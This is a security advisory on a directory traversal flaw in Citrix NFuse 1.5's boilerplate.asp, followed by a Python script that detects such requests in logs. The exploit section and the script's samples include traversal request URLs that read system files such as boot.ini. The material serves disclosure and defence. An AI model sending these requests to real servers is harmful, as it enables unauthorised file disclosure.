Citrix NFuse is an application portal that lets organizations integrate and publish interactive applications into any standard web browser. NFuse is a three-tier solution that includes a Citrix Server component, a Web Server component, and a Citrix ICA client component with a web browser. A security vulnerability in the product allows attackers to retrieve files that reside on the remote server after they have authenticated with it (i.e. download any file, even one that resides outside the bounding HTML root directory).
Credit:
The information has been provided by Eric Budke.
Vulnerable systems:
NFuse version 1.5
Given that you must be authenticated first, one assumes that you have some minimal level of trust in the end user, so the severity is not that high. However, since sensitive files can be accessed, this kind of vulnerability might prove to be dangerous. Furthermore, several Internet-based sites require no such authentication, placing them in danger.
Solution:
According to Citrix, this issue exists only in NFuse version 1.5, because boilerplate.asp no longer exists in the most recent version.
Exploit:
A request such as:
http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica
Can be replaced with one like this:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
Or alternatively:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
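Detection:
The following check is an added example, not part of the original advisory and not Citrix code. It flags logged requests to boilerplate.asp whose NFuse_Template value points outside the template directory. The function names are hypothetical and the last sample request is constructed to show that encoded separators are normalised before the check.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

TARGET_PAGE = "/boilerplate.asp"     # page named in the advisory
TEMPLATE_PARAM = "nfuse_template"    # compared case-insensitively

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide separators."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_template(url):
    """Return the normalised NFuse_Template value if it leaves the
    template directory, otherwise None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(TARGET_PAGE):
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() != TEMPLATE_PARAM:
            continue
        for raw in values:
            value = fully_decode(raw).replace("\\", "/")
            if (".." in value.split("/")                # parent-directory segment
                    or value.startswith("/")            # rooted path
                    or re.match(r"[A-Za-z]:", value)):  # drive letter
                return value
    return None

def scan(urls):
    """Return (url, offending value) pairs for every flagged request."""
    checked = ((url, suspicious_template(url)) for url in urls)
    return [(url, value) for url, value in checked if value is not None]

# The first three requests are the ones in the advisory; the last is constructed.
SAMPLE_REQUESTS = [
    "http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica",
    "http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/",
    "http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories",
    "http://10.x.x.x/boilerplate.asp?nfuse_template=%2e%2e%5cboot.ini",
]

if __name__ == "__main__":
    for url, value in scan(SAMPLE_REQUESTS):
        print("ALERT", value, "<-", url)
```

The same normalise-then-check order applies to a server-side fix: decode and canonicalise the parameter first, then reject anything that is not a plain file name inside the template directory.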